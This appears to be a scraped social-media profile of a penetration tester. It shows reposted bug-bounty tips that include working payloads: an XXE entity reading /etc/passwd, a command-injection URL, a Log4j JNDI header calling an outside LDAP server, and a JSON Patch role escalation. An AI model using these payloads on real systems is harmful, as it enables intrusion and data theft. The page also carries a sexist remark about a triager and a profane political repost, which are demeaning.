@Amr_MustafaAA Profile picture

Amr Mustafa

@Amr_MustafaAA

Penetration tester at BugSwagger | Bug Hunter at @Hacker0x01

Similar User
Mohamed Fodil photo

@_public_void

z3r0xk.dll 🇵🇸 photo

@z3r01k

Un9nPlayer photo

@Un9nPlayer

errorsec_ photo

@errorsec_

foysal_joy photo

@Error_foysal

Abdelrhman Allam 🇵🇸 photo

@sl4x0

Samir Gondaliya photo

@SamirGondaliya6

Gotcha1G photo

@Gotcha1G

Sourav Khan🇧🇩 🇵🇸 photo

@Br0k3n_1337

Kullai⚡️ photo

@Kullai12

Rahmat Qurishi photo

@RahmatQurishi

Zhenwarx photo

@zhenwarx

Fares Walid 🇪🇬🇵🇸 photo

@SirBagoza

Nitesh Patel🇳🇵🚩 photo

@Nitesh_patel7

4d486733 photo

@4d486733

Amr Mustafa Reposted

AEM guideContainer XXE? guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}} #AEMSecurity

Tweet Image 1

Amr Mustafa Reposted

Advanced SQL Injection Techniques now available in GitBook. Make a copy/ Archive / Convert to PDF before they report this too :). #bugbountytip #BugBounty #SQLInjection #SQLi nav1n0x.gitbook.io/advanced-sql-i…


Amr Mustafa Reposted

Add to your wordlist : actuator/env actuator/auditevents actuator/beans actuator/caches actuator/configprops actuator/health actuator/heapdump actuator/info actuator/integrationgraph actuator/configprops #bugbountytip #bugbountytips #bugbounty #hackerone #bugcrowd #h1

Tweet Image 1

Amr Mustafa Reposted

Hello fellow hackers, I'm excited to share my recent bug bounty writeup on how I chained an HTML Injection to a critical SSRF. You can find the write-up linked below uchihamrx.medium.com/the-pdf-trojan… #bugbountytips #bugbountytip #BugBounty #websecurity


Amr Mustafa Reposted

Just published a new write-up on how we uncovered two high-impact bugs in a private bug bounty program! 🐛📷Collab With: @Amr_MustafaAA #bugbountytips Check out the details and our journey at sallam.gitbook.io/sec-88/bug-bou…


I bet the triager is a woman

wtf is that

Tweet Image 1


Amr Mustafa Reposted

Fuck #Israel.


Amr Mustafa Reposted

many APIs are vulnerable to "JSON Patch" where you have access to the op, you can add, remove, replace, move, copy example : { "op": "replace", "path": "/role", "value": "admin" }, more info : datatracker.ietf.org/doc/html/rfc69… jsonpatch.com #BugBounty #bugbountytips

Tweet Image 1

Amr Mustafa Reposted

story of very quick RCE Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 You can to add this paths for ur wordlist cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 cgi-bin/reset.cgi?db_prefix=%26id%26 fuzzing as well cgi-bin/FUZZ.cgi?FUZZ=%26id%26 #bugbountytips ❤️

Tweet Image 1

Amr Mustafa Reposted

Log4j 🙌 Application was running java Vulnerable header : X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>} #BugBounty #bugbountytips #Security

Tweet Image 1

Amr Mustafa Reposted

Exposed Api_key let to expose customers information including (Full name , username , Job rule ,phone_number) 1. In Github : "site.com" x-api-key 2.read the api documentation this was reported as P2/P3 but since the api key is for demo its P4

Tweet Image 1

Amr Mustafa Reposted

CSRF Functions + Bypass Checklist #bugbounty #bugbountytips

Tweet Image 1

Don't Forget when you use FFUF to add `.old` after the endpoint,it maybe let you find some backup files and extract some private/internal data Ex: ffuf -u https://{domain}/FUZZ.old -w php_wordlist.txt -mc 200 Happy Hunting! #bugbountytips #hackerone #bugbounty #CyberSecurity

Tweet Image 1

Amr Mustafa Reposted

Writeup about some finding at invitation function and escalation of finding with different impact .. medium.com/@mrxdevil404/s… Enjoy #bugbountytips


Loading...

Something went wrong.


Something went wrong.